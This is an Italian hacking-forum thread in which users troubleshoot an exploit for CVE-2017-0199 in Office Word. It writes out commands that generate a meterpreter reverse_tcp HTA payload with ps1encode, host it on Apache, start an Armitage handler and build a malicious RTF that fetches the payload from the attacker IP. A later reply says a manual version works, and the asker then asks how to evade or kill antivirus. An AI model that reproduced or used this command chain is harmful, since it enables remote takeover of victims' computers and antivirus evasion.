Domanda Exploit Office Word 2007

Stato
Discussione chiusa ad ulteriori risposte.
La sintassi corretta è:
Codice:
./ps1encode.rb -i [lhost] -p [lport] -a windows/meterpreter/reverse_tcp -t hta


Non ho capito cosa intendi. Crea il payload e copialo in /var/www/html.
Intendevo per farlo risultare all'indirizzo 192.168.1.76:4447 che imposto per la creazione del payload
 
Faccio partire il tutto, facendo doppio click sull'icona del collegamento al file prova.hta e mi si apre una schermata bianca senza accadere niente.

Se dal browser digito 192.168.1.76:4446 sulla console mi compare il messaggio di errore come da foto.

Gli antivirus sono stati esclusi.
1f04ba7971d96842052c1a095564b0a5.jpg
 
Quindi potrebbe essere un problema di payload, generato male?

È giusta la configurazione data ad armitage? Come encoder ho dovuto mettere shikata ga nai. Ps1encoder non riesco ad inserirlo mi da errore.

Mi sa che l'ho copiato nella cartella sbagliata (metasploit-framework/modules/encoder/)
 
Quindi potrebbe essere un problema di payload, generato male?
Ma come l'hai generato il payload? Io dall'immagine vedo che hai settato un handler.
Mi sa che l'ho copiato nella cartella sbagliata (metasploit-framework/modules/encoder/)
Non lo devi copiare in nessuna cartella. Lo scarichi da github, ti porti sulla directory ps1encode e crei il payload encodato.
 
Ma come l'hai generato il payload? Io dall'immagine vedo che hai settato un handler.

Non lo devi copiare in nessuna cartella. Lo scarichi da github, ti porti sulla directory ps1encode e crei il payload encodato.
Il payload l'ho generato così:

Codice:
./ps1encode.rb -i [lhost] -p [lport] -a windows/meterpreter/reverse_tcp -t hta

il risultato copiato ed incollato su di un file di testo prova.hta che vado a copiare su /var/www/

Avvio armitage

Seleziono payload Windows/meterpreter_reverse_tcp

Imposto LHOST 192.168.1.76 e LPORT4446 e lui mi imposta di default il multi/handler . Lo faccio partire

Crea poi file Word con oggetto OLE con collegamento a 192.168.1.76/prova.hta

Ed infine lo apro sul computer vittima
 
Dovresti smanettare un po' con la configurazione di Apache. Fai una cosa: scarica Exploit toolkit CVE-2017-0199 (è uno script in Python che trovi su Github) e usalo in modalità "Custom HTA file" con il payload hta che hai generato.
 
Dovresti smanettare un po' con la configurazione di Apache. Fai una cosa: scarica Exploit toolkit CVE-2017-0199 (è uno script in Python che trovi su Github) e usalo in modalità "Custom HTA file" con il payload hta che hai generato.

non ne vengo a capo...
sono 2 giorni che faccio le prove ma niente, e sono sicuro che una volta ha funzionato ma non riesco a replicare, non ricordo come ho fatto....

allora la sequenza da file readme è la seguente:

Codice:
### Scenario 3: Deliver custom HTA file
###### Example commands
   1) Generate malicious RTF file
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
   2) Start toolkit in exploit mode to deliver custom HTA file
      # python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta

io il file hta l'ho messo sul desktop /root/Scrivania/hta.hta
IP vittima 192.168.1.73
IP attaccante: 192.168.1.76

e lancio questa sequenza:

Codice:
creo hta

./ps1encode.rb -i 192.168.1.76 -p 80 -a windows/meterpreter/reverse_tcp -t hta
python cve-2017-0199_toolkit.py -M gen -w rtfmale.rtf -u 192.168.1.76/logo.doc -x 1
python cve-2017-0199_toolkit.py -M exp -H /root/Scrivania/hta.hta

non funziona!!! si apre il file word, l'oggetto OLE ha collegamento http://192.168.1.76/logo.doc

altra prova:

avvio Apache2 e metto il file hta su /var/www/html/
Codice:
systamctl start apache2.service

creo hta

./ps1encode.rb -i 192.168.1.76 -p 4447 -a windows/meterpreter/reverse_tcp -t hta

python cve-2017-0199_toolkit.py -M gen -w rtfmale.rtf -u 192.168.1.76/logo.doc -p 4447 -x 1
python cve-2017-0199_toolkit.py -M exp -H 192.168.1.76/hta.hta -p 4447

non funziona neanche così, ma dove ho sbagliato? di prove ne ho fatte tantissime altre, ho disattivato antivirus e firewall.
 
Dovresti smanettare un po' con la configurazione di Apache. Fai una cosa: scarica Exploit toolkit CVE-2017-0199 (è uno script in Python che trovi su Github) e usalo in modalità "Custom HTA file" con il payload hta che hai generato.

non ne vengo a capo...
sono 2 giorni che faccio le prove ma niente, e sono sicuro che una volta ha funzionato ma non riesco a replicare, non ricordo come ho fatto....

allora la sequenza da file readme è la seguente:

Codice:
### Scenario 3: Deliver custom HTA file
###### Example commands
   1) Generate malicious RTF file
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
   2) Start toolkit in exploit mode to deliver custom HTA file
      # python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta

io il file hta l'ho messo sul desktop /root/Scrivania/hta.hta
IP vittima 192.168.1.73
IP attaccante: 192.168.1.76

e lancio questa sequenza:

Codice:
creo hta

./ps1encode.rb -i 192.168.1.76 -p 80 -a windows/meterpreter/reverse_tcp -t hta
python cve-2017-0199_toolkit.py -M gen -w rtfmale.rtf -u 192.168.1.76/logo.doc -x 1
python cve-2017-0199_toolkit.py -M exp -H /root/Scrivania/hta.hta

non funziona!!! si apre il file word, l'oggetto OLE ha collegamento http://192.168.1.76/logo.doc

altra prova:

avvio Apache2 e metto il file hta su /var/www/html/
Codice:
systamctl start apache2.service

creo hta

./ps1encode.rb -i 192.168.1.76 -p 4447 -a windows/meterpreter/reverse_tcp -t hta

python cve-2017-0199_toolkit.py -M gen -w rtfmale.rtf -u 192.168.1.76/logo.doc -p 4447 -x 1
python cve-2017-0199_toolkit.py -M exp -H 192.168.1.76/hta.hta -p 4447

non funziona neanche così, ma dove ho sbagliato? di prove ne ho fatte tantissime altre, ho disattivato antivirus e firewall.
 
non ne vengo a capo...
sono 2 giorni che faccio le prove ma niente, e sono sicuro che una volta ha funzionato ma non riesco a replicare, non ricordo come ho fatto....

In effetti nemmeno a me funziona quell'exploit, e ho notato che molti hanno problemi anche con la modalità "Deliver local payload". Provo a fare qualche altro test.
 
non ne vengo a capo...
sono 2 giorni che faccio le prove ma niente, e sono sicuro che una volta ha funzionato ma non riesco a replicare, non ricordo come ho fatto....
Ho provato ad exploitarla manualmente e funziona:
successsss.jpg

C'è una riga di codice da aggiungere al payload e una piccola modifica da fare al mime.conf di apache. Semmai ci apro un thread in modo che possa essere utile anche agli altri
 
Ultima modifica:
Si così manualmente adesso funziona anche a me. Rimane però sempre rilevabile dall'anti virus.

Sto pensando di iniziare a studiare VB non so se è l'unica via d'uscita x sfuggire dall'AV.

Altrimenti non si riesce a killare l'antivirus per poi entrare tramite file Word?
 
Stato
Discussione chiusa ad ulteriori risposte.